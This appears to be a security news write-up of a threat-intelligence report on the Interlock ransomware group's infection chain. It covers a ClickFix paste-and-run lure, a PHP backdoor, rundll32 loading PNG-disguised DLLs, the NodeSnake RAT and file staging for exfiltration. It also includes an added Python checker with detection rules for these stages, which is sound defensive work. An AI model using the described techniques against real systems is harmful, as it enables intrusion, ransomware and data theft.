Attack overview diagram | Image: TRU
The eSentire Threat Response Unit (TRU) exposed a detailed and technically sophisticated ransomware campaign orchestrated by the notorious Interlock Group, a threat actor operating across North America and Europe since at least September 2024. This latest analysis reveals an elaborate infection chain, multi-stage payloads, obfuscated PHP scripts, and backup C2 infrastructure.
“Despite its name, this tool functions primarily as a backdoor rather than a Remote Access Trojan (RAT), with support for several attacker-supplied commands to allow for further reconnaissance and ransomware deployment,” TRU analysts noted about the so-called Interlock RAT.
The campaign begins on compromised websites (notably KongTuke) that redirect visitors into a social engineering lure dubbed ClickFix. Victims are coaxed into pasting and executing an obfuscated PowerShell command.
This script fingerprints the victim’s system, sends the data to the command-and-control (C2) server, and retrieves a malicious payload that simulates an error window while preparing further deployment.
The next stages involve multiple obfuscated payloads and LOLBins:
- A Windows shortcut (.lnk) points to a launcher binary c2.exe.
- PowerShell executes a PHP interpreter, which loads an obfuscated backdoor called config.cfg.
- The Interlock PHP Backdoor supports commands like “EXE”, “DLL”, “JS”, and “CMD” to download payloads and enable persistence.
“TRU observed Interlock Group using this backdoor to deploy NodeSnake… used to harvest sensitive files for exfiltration.”
The attacker’s toolkit is diverse: it includes using rundll32.exe to execute PNG files that are in fact DLLs, and NodeJS to run JavaScript payloads.
Upon verifying that the victim is not in a virtual environment, the attackers deploy NodeSnake RAT, leveraging a full Node.js environment downloaded and installed silently on the victim’s machine.
The Node.js runtime was fetched as an archive from nodejs.org and, together with NodeSnake (node.log), deployed through PowerShell commands.
Sensitive victim files are base64-encoded and stored in C:\Users\Public for later exfiltration. System data is encrypted with a custom XOR algorithm, compressed using Gzip, and sent to the attacker’s C2 infrastructure.
In addition to primary C2 servers, Interlock maintains a backup mechanism stored in a temp file hiskeow.tmp, decrypted via a custom XOR algorithm seeded with runtime values. The group’s custom backdoor supports reverse shell capabilities, self-deletion, and adaptive command execution.
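A defender-side example, added here and not part of the TRU report: a small Python checker that flags process-creation and file-creation events matching the execution chain described above (the c2.exe launcher, PowerShell spawning a PHP interpreter that loads config.cfg, rundll32.exe loading a .png as a DLL, node.exe running node.log, and the hiskeow.tmp backup C2 file). The event lines are constructed for illustration, and the "key=value" field layout is a simplified Sysmon-style format assumed for this example.

```python
import re

# Each rule lists the event fields that must ALL match (case-insensitive) for a hit.
# Field names follow a simplified Sysmon-like layout assumed for this example.
RULES = [
    # .lnk launcher binary c2.exe being executed
    ("c2_exe_launcher", {"Image": r"\\c2\.exe$"}),
    # PowerShell spawning a PHP interpreter that loads the config.cfg backdoor
    ("php_loads_config_cfg", {"ParentImage": r"\\powershell\.exe$", "Image": r"\\php\.exe$", "CommandLine": r"config\.cfg"}),
    # rundll32.exe asked to load a .png file as if it were a DLL
    ("rundll32_png_as_dll", {"Image": r"\\rundll32\.exe$", "CommandLine": r"\.png\b"}),
    # Node.js running the NodeSnake payload stored as node.log
    ("node_runs_node_log", {"Image": r"\\node\.exe$", "CommandLine": r"\bnode\.log\b"}),
    # backup C2 configuration written to hiskeow.tmp
    ("backup_c2_temp_file", {"TargetFilename": r"\\hiskeow\.tmp$"}),
]

# Constructed sample events (not real telemetry): "key=value" pairs whose values may contain spaces.
SAMPLE_EVENTS = [
    r"EventType=ProcessCreate ParentImage=C:\Windows\explorer.exe Image=C:\Users\Public\c2.exe CommandLine=C:\Users\Public\c2.exe",
    r"EventType=ProcessCreate ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Image=C:\Users\Public\php\php.exe CommandLine=php.exe config.cfg",
    r"EventType=ProcessCreate ParentImage=C:\Users\Public\php\php.exe Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe C:\Users\Public\a.png,Run",
    r"EventType=ProcessCreate ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Image=C:\Users\Public\nodejs\node.exe CommandLine=node.exe node.log",
    r"EventType=FileCreate Image=C:\Users\Public\php\php.exe TargetFilename=C:\Users\alice\AppData\Local\Temp\hiskeow.tmp",
    # benign activity that shares a LOLBin with the chain but not the malicious arguments
    r"EventType=ProcessCreate ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    r"EventType=ProcessCreate ParentImage=C:\Windows\explorer.exe Image=C:\Program Files\nodejs\node.exe CommandLine=node.exe server.js",
]

# A value runs until the next "word=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line: str) -> dict:
    """Turn one key=value event line into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def match_event(event: dict) -> list:
    """Return the names of every rule whose fields all match this event."""
    return [name for name, conds in RULES
            if all(re.search(rx, event.get(field, ""), re.IGNORECASE)
                   for field, rx in conds.items())]


def scan(lines) -> dict:
    """Map each triggered rule name to the event lines that triggered it."""
    findings = {}
    for line in lines:
        for name in match_event(parse_event(line)):
            findings.setdefault(name, []).append(line)
    return findings
```

Calling scan(SAMPLE_EVENTS) reports one hit per malicious stage and none for the two benign rundll32/node events; in practice the same rules would be fed Sysmon process-creation and file-creation fields.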
Interlock Group’s relentless innovation—combining PHP, NodeJS, reverse shells, and obfuscated C2 protocols—demonstrates how ransomware gangs are investing heavily in modular, layered attack architectures.